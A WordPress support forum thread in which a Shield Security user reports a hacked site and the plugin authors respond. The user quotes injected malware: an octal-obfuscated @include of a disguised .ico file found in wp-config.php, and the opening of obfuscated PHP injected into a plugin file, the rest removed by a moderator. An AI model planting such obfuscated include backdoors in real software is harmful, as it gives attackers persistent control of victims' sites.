Support » Plugin: Shield Security: Protection with Smarter Automation » 2 important issues found

  • Resolved manare

    (@manare)


    Hi.
    I’ve been testing your Shield Security for 2 days and it’s a good security tool, however, I found a couple of issues which I wanted to let you know.

    I must say my site was previously attacked last week and now that it has been restored is still being constantly attacked (by what I see with your plugin).
    I don’t know how, but the bot attacker still gets access to my core files and modify them. “index.php” is modified every 12 hours more or less and some encrypted code is added to the header. Once that happens, 2 additional .txt files are also generated by the modified index.php file. If I delete the 2 txt files, they’re automatically re-generated again with a different name. Unless I edit the index.php file and delete the added code, this keeps on happening over and over.
    Your plugin does detect these 3 files, however it does not prevent it from happening over and over again every X hours.

    Apart from that, I also noticed that my “wp-config.php” file had also been infected, but your plugin did not detect it, and that is and important issue.
    Here’s the code which was attached to my file (and that I manually deleted):
    <?php
    /*849b0*/

    @include “\057va\162/w\167w/\166ho\163ts\057gr\163.c\141t/\150tt\160do\143s/\060OL\104_S\111TE\057Bl\141de\137fl\141sk\137ar\143hi\166os\057.1\0662e\070ba\065.i\143o”;

    /*849b0*/
    /**

    Another issue with your current version 7.1.2 is that in my WordPress 4.7.12, WP File Editing is enabled although I set it to disabled in your options. In order to get it eventually disabled, I had to add this “define( ‘DISALLOW_FILE_EDIT’, true );” to my wp-config.php file.

    I’ll wait for your comments,
    Thank you

Viewing 8 replies - 1 through 8 (of 8 total)
  • Plugin Author One Dollar Plugin

    (@onedollarplugin)

    I’ll take the last issue 1st. When you say “to get it eventually disabled” – what action(s) were you performing exactly that contradicted the Shield setting? And when you say it was disabled on the options, was the slider green, or grey? For it to be disabled, the Shield setting must be green (turned on).

    Regarding this other issue, it sounds like you are running a compromised website. This means that something or someone has access to your WordPress hosting file system. What you’re then saying is:

    “My site is currently compromised and has a backdoor of some sort. Shield is not blocking this backdoor.”

    If you have a permanent hole on your site, Shield wont likely be able to block it.

    We have dev plans in place to monitor the index.php & wp-config.php files for changes, but these aren’t in-place yet. They also wouldn’t block the backdoor, just help detect and repair changes.

    The 1st thing to do on your site is find the hole and plug it.

    Hi.
    Thanks for your prompt answer.
    WP File Editing: Yes, the slider shows “green”, but when I check it at “Overview” it says it’s disabled. So, that’s why I added the “define” line to my wp-config.php file.

    Backdoor: I understand what you say. The plugin protects a clean website, but if there’s already a troyan script inside somewhere..- then I’m done. It’s obvious.

    I guess my site is compromised (5868 transgressions in just less than 3 days), so it’s really difficult to upload my backup copy and install your plugin right away without being already infected. If my wp-config.php file was compromised, then my DDBB must be infected too. I don’t know how to proceed not to be infected again during this short period of time when your plugin is being installed and activated… these bots are too fast for anyone.
    I’ll delete it all over again and upload my backup + your plugin. Let’s cross fingers.

    Cheers,

    Plugin Author One Dollar Plugin

    (@onedollarplugin)

    Well transgressions means that something is being blocked, which is a great start.

    First thing I’d do is put on CloudFlare and turn on the setting “Help, I’m under attack”. This should go a long way to help you out. Then it’s down to you to clean the files (install originals) and data. Hope you get it sorted!

    Just want to mention that the CloudFlare plugin for WP Last Updated: 1 year ago

    Plugin Author Paul

    (@paultgoodchild)

    For these purposes you shouldn’t need the Cloudflare plugin at all. I’m not sure you’d ever need it..

    manare

    (@manare)

    Hi again.
    I’m still having issues though using Cloudflare.
    I’m writing just to let you know something that perhaps you may improve in the future (if it depends on you, of course).
    Among my -once again- infected files, this time I also found one which belongs to your plugin and that it became infected:
    module-help-hack_protect.php

    I think it’d be good if this plugin of yours could find a way to protect itself against modifications (if feasable), otherwise, that it’d include perhaps a file checksum everytime it runs (or every X-given time).

    Here’s the code I found in the above mentioned file, hope it helps (no idea what it does):

    <?php $fed7 = 374;$GLOBALS[‘ac9b8d9d’] = Array();global $ac9b8d9d;$ac9b8d9d = $GLOBALS;${“\x47\x4c\x4fB\x41\x4c\x53”}[‘v77f2a87’] =

    [rest of code deleted — please do not post malware code]

    • This reply was modified 7 months ago by  manare. Reason: non easily readable injected code on top if inside code tag
    • This reply was modified 7 months ago by  Steve Stern.
    Plugin Author One Dollar Plugin

    (@onedollarplugin)

    Hi,

    This file isn’t shipped with the plugin – it doesn’t come with the Shield plugin.

    The paid upgrade to Shield has further protections against file modifications on plugins which would find this file and notify you. This sort of functionality isn’t included with the free version.

    If you’d like to learn more about Pro, please do feel free to check it out here. However, further discussion of Pro upgrades etc. and support isn’t permitted on these forums as discussion must only pertain to the free plugins as provided on WordPress.org so we can’t discuss it any further here. But you can contact us at any time to find out more.

    Thanks.

    manare

    (@manare)

    Hi.
    Thanks for your answer.

    Obviously, that malware code did not come with your plugin! It was injected yesterday due to the attacks I’m suffering.

    Sorry for having posted that malware code, I just did it in order to let you see whether it was generic code or malware code adapted to your plugin (and I could not attach the file). I was not actually asking for help, but just thinking I could be of help if I’d show you what it had been added to that file. 😉

    Sure thing, I’ll be buying a pro licence as soon as I change my current host provider (I believe their firewall is almost non-existant).

    Cheers,

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘2 important issues found’ is closed to new replies.